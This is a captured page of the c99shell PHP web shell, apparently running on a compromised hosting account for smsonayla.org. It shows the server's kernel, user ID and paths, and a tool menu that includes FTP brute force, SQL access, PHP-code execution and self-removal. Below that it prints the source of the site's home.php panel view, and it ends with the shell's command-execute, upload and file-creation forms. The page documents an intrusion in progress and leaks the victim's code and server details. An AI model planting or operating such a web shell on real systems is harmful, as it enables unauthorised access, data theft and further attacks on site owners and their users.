smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/home/necipbey/public_html/app/Views/default/Panel/   drwxr-xr-x
Free 3425.26 GB of 4265.01 GB (80.31%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     home.php (2.95 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?= $this->extend(currentTheme() . '/layout'); ?>
<?= $this
->section('content'); ?>
<div class="row">
    <div class="col-md-2">
        <div class="card">
            <div class="card-body">
                <div class="form-group">
                    <input type="text" id="filterCategories" placeholder="Kategori Ara" class="form-control col-12">
                </div>
                <span class="mr-1 font-weight-bolder">Bakiyeniz:</span> <?= user()['balance']; ?>
            </div>
        </div>
    </div>
    <div class="col-md-10">
        <div class="row">
            <?php if ($categories && count($categories) > 0) : ?>
                <?php foreach ($categories as $category) : ?>
                    <div class="category col-md-4" data-toggle="modal" data-target="#orderModal" data-category="<?= $category['id']; ?>" data-name="<?= $category['name']; ?>" data-icon="<?= $category['icon']; ?>">
                        <div class="card" style="height:125px; background-color: #<?= $category['color']; ?>;">
                            <div class="card-body">
                                <h4 class="card-title"><i class="<?= $category['icon']; ?>"></i> | <span class="categoryName"><?= $category['name']; ?></span></h4>
                                <a href="#" class="card-link text-light">Kategoriyi İncele</a>
                            </div>
                        </div>
                    </div>
                <?php endforeach; ?>
            <?php endif; ?>
        </div>
    </div>
</div>
<div class="modal fade" id="orderModal" tabindex="-1" role="dialog" aria-labelledby="modalLabel" aria-hidden="true">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <h5 class="modal-title" id="modalLabel"></h5>
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true">
                    <i class="tim-icons icon-simple-remove"></i>
                </button>
            </div>
            <div class="modal-body">
                <div class="form-group">
                    <label>Ülke Seçiniz:</label>
                    <select class="form-control text-dark" id="services"></select>
                </div>
                <div class="form-group">
                    <label>Fiyat:</label>
                    <input type="text" class="form-control text-white" id="servicePrice" disabled>
                </div>
            </div>
            <div class="modal-footer">
                <div class="col"></div>
                <button type="button" id="buyNumber" class="btn btn-primary">Satın Al</button>
            </div>
        </div>
    </div>
</div>
<style>
    .hidden {
        display: none !important;
    }
</style>
<?= $this->endSection('content'); ?>
<?= $this
->section('js'); ?>
<script src="<?= base_url('assets/panel.index.js'); ?>"></script>
<?= $this->endSection('js'); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0044 ]--